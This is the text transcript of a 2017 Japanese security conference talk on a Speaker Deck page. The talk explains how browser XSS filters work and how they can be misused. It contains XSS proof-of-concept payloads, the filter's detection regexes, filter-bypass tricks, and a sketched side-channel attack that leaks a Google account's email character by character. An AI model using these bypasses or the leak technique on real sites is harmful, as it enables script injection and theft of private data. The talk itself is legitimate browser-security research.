Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up
for free
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
Masato Kinugawa
March 31, 2017
Technology
7
2.1k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。
Masato Kinugawa
March 31, 2017
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
masatokinugawa
21
4.9k
masatokinugawa
5
67k
masatokinugawa
9
10k
masatokinugawa
17
10k
masatokinugawa
35
17k
masatokinugawa
2
1.4k
masatokinugawa
20
20k
masatokinugawa
4
2.2k
masatokinugawa
8
15k
Other Decks in Technology
See All in Technology
sky_joker
0
120
papix
0
230
clustervr
0
170
yutamakotaro
1
210
meteatamel
0
410
hikarut
1
100
mukai21
0
210
shimacos
2
360
kraj
0
5.4k
chaspy
3
930
clustervr
0
200
stakaya
14
8.4k
Featured
See All Featured
jlugia
216
16k
pauljervisheath
196
15k
chriscoyier
145
19k
samanthasiow
56
6.3k
malarkey
393
60k
lauravandoore
11
1.3k
dotmariusz
94
5.1k
mthomps
39
2.3k
kastner
54
1.9k
rocio
155
11k
lara
590
61k
destraynor
146
19k
Transcript
None
None
❶ ➌ ❷ ❹
None
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>
https://addons.mozilla.org/ja/firefox/addon/noscript/
HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
None
None
None
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">
None
<input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
<input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701
<title><script> - Google 検索</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>
<script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? }
</script> https://example.com/?<script src=//example.jp/jquery.js></script>
None
{<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] "><svg #nload=alert#1#>
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>
"><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])) )).+?{\(}.*?{\)} x="";alert(1)//"
None
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622
https://www.slideshare.net/masatokinugawa/xxn-ja
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL:
?q=";document.body.innerHTML="<xss>
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script>
URL: ?"/++.+++=
"style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:
<script src="//example^co.jp/test.js" type="text/javascript"> </script>
window#name//Syntax Error window^name//Syntax OK <script> window.name
None
url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }
https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from
an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else
https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>
https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]
https://bugs.chromium.org/p/chromium/issues/detail?id=654794
None
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //
// }else{ // } <script>…</script>
https://www.youtube.com/watch?v=IMDWjKFbsJE
HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options:
SAMEORIGIN
https://accounts.google.com/ServiceLogin?
google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br
google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(
✨ ✨ ✨
{<a.*?hr{e}f}
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref
0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f>
5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
<div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}
✔ ✔ ✔ ✔
<div class="gb_xb">masatokinugawa@gmail.com</div><div class="gb_pb">
https://www.google.co.jp/?"-------@gmail.com--div--div-class= https://www.google.co.jp/?"--------@gmail.com--div--div-class= https://www.google.co.jp/?"---------@gmail.com--div--div-class= https://www.google.co.jp/?"----------@gmail.com--div--div-class= https://www.google.co.jp/?"-----------@gmail.com--div--div-class= https://www.google.co.jp/?"------------@gmail.com--div--div-class= https://www.google.co.jp/?"-------------@gmail.com--div--div-class= https://www.google.co.jp/?"--------------@gmail.com--div--div-class= https://www.google.co.jp/?"---------------@gmail.com--div--div-class=
https://www.google.de/?"-a-------------@gmail.com--div--div-class= https://www.google.de/?"-b-------------@gmail.com--div--div-class= https://www.google.de/?"-c-------------@gmail.com--div--div-class= https://www.google.de/?"-d-------------@gmail.com--div--div-class= https://www.google.de/?"-e-------------@gmail.com--div--div-class= https://www.google.de/?"-f-------------@gmail.com--div--div-class= https://www.google.de/?"-g-------------@gmail.com--div--div-class= https://www.google.de/?"-h-------------@gmail.com--div--div-class= https://www.google.de/?"-i-------------@gmail.com--div--div-class= https://www.google.ru/?"-j-------------@gmail.com--div--div-class=
https://www.google.ru/?"-k-------------@gmail.com--div--div-class=
https://www.google.ru/?"-l-------------@gmail.com--div--div-class= https://www.google.ru/?"-m-------------@gmail.com--div--div-class= https://www.google.ru/?"-ma------------@gmail.com--div--div-class= https://www.google.ru/?"-maa-----------@gmail.com--div--div-class= https://www.google.ru/?"-mab-----------@gmail.com--div--div-class= https://www.google.ru/?"-mac-----------@gmail.com--div--div-class= https://www.google.ru/?"-mad-----------@gmail.com--div--div-class= https://www.google.ca/?"-mae-----------@gmail.com--div--div-class= ...
✨ ✨ ✨
None
None
None
None
None